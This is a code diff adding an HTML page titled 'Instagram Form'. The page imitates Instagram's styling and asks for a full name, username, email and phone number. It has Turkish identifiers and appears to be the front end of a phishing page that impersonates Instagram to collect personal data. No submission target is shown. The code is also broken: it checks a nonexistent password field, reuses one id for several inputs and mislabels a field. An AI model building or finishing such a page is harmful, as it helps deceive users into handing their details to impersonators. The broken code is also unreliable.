|
| 1 | +<!DOCTYPE html> |
| 2 | +<html lang="en"> |
| 3 | +<head> |
| 4 | + <meta charset="UTF-8"> |
| 5 | + <meta name="viewport" content="width=device-width, initial-scale=1.0"> |
| 6 | + <title>Instagram Form</title> |
| 7 | + <meta name="robots" content="noimageindex, noarchive"> |
| 8 | + <meta name="apple-mobile-web-app-status-bar-style" content="default"> |
| 9 | + <meta name="mobile-web-app-capable" content="yes"> |
| 10 | + <meta name="theme-color" content="#ffffff"> |
| 11 | + <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover"> |
| 12 | + <link rel="stylesheet" href="css/style1.css" type="text/css" crossorigin="anonymous"> |
| 13 | + <link rel="stylesheet" href="css/style2.css" type="text/css" crossorigin="anonymous"> |
| 14 | + <link rel="stylesheet" href="css/style3.css" type="text/css" crossorigin="anonymous"> |
| 15 | + <script> |
| 16 | + function form_kontrol() { |
| 17 | + if(document.getElementById("password").value.length == 0) |
| 18 | + document.getElementById("gonder").disabled = true; |
| 19 | + else |
| 20 | + document.getElementById("gonder").disabled = false; |
| 21 | + document.getElementById("gonder").style.background = "#3897f0"; |
| 22 | + document.getElementById("gonder").style.borderColor = "#3897f0"; |
| 23 | + } |
| 24 | + </script> |
| 25 | + <style> |
| 26 | + #kutu { |
| 27 | + font-family: sans-serif; |
| 28 | + background: white; |
| 29 | + margin-top: 45px; |
| 30 | + padding-top: 7px; |
| 31 | + padding-bottom: 4px; |
| 32 | + width: 350px; |
| 33 | + max-width: 90%; |
| 34 | + border: 1px solid #dedede; |
| 35 | + height: 80vh; |
| 36 | + } |
| 37 | + #username { |
| 38 | + text-overflow: ellipsis; |
| 39 | + font: 400 13.3333px Arial; |
| 40 | + background-color: #fafafa; |
| 41 | + outline: none; |
| 42 | + padding-left: 6px; |
| 43 | + width: 260px; |
| 44 | + height: 30px; |
| 45 | + border: 1px solid #e6e6e6; |
| 46 | + margin: 7px 0; |
| 47 | + } |
| 48 | + .button { |
| 49 | + margin: 0; |
| 50 | + font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif; |
| 51 | + font-size: 14px; |
| 52 | + line-height: 20px; |
| 53 | + display: block; |
| 54 | + font-weight: 600; |
| 55 | + padding: 5px; |
| 56 | + text-align: center; |
| 57 | + text-transform: inherit; |
| 58 | + width: 80%; |
| 59 | + border-radius: 4px; |
| 60 | + color: rgba(255, 255, 255, 1); |
| 61 | + border: 1px solid transparent; |
| 62 | + background-color: rgba(0, 149, 246, 1); |
| 63 | + } |
| 64 | + .button:disabled { |
| 65 | + opacity: 0.5; |
| 66 | + } |
| 67 | + .hide { |
| 68 | + display: none; |
| 69 | + } |
| 70 | + </style> |
| 71 | +</head> |
| 72 | +<body> |
| 73 | + <center> |
| 74 | + <div id="kutu"> |
| 75 | + <br> |
| 76 | + <center> |
| 77 | + <img src="path_to_image.jpg" alt="" width=150 style="border-radius:50%; margin-top:15px;"> |
| 78 | + </center> |
| 79 | + <br> |
| 80 | + <div class="Et89U"> |
| 81 | + <label class="f0n8F"><input id="username" name="Phone Number" required placeholder="Full name" class="_2hvTZ pexuQ zyHYP" onkeyup="form_kontrol()"></label><br> |
| 82 | + <label class="f0n8F"><input id="username" name="username" required placeholder="Username" class="_2hvTZ pexuQ zyHYP" onkeyup="form_kontrol()"></label><br> |
| 83 | + <label class="f0n8F"><input id="username" type="email" name="mail" required placeholder="Email address" class="_2hvTZ pexuQ zyHYP" onkeyup="form_kontrol()"></label><br> |
| 84 | + <label class="f0n8F"><input id="username" type="number" name="phone" required placeholder="Phone Number" class="_2hvTZ pexuQ zyHYP" onkeyup="form_kontrol()"></label><br> |
| 85 | + <center> |
| 86 | + <button type="submit" id="gonder" class="button" style="background: rgb(56, 151, 240); border-color: rgb(56, 151, 240);"> |
| 87 | + <span class="btn-txt">Send</span> |
| 88 | + </button><br><br> |
| 89 | + </center> |
| 90 | + <br> |
| 91 | + </div> |
| 92 | + </div> |
| 93 | + </center> |
| 94 | +</body> |
| 95 | +</html> |
0 commit comments